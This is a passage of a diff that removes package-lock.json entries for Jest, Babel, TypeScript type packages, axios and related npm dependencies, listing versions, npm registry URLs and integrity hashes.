}, - "@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - } - }, - "@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "requires": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - } - }, - "@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3" - } - }, - "@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - } - }, - "@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - } - }, - "@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - } - }, - "@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - } - }, - "@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true - }, - "@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - }, - "dependencies": { - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - } - } - }, - "@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "requires": { - "sprintf-js": "~1.0.2" - } - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "requires": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } - }, - "babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "requires": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": 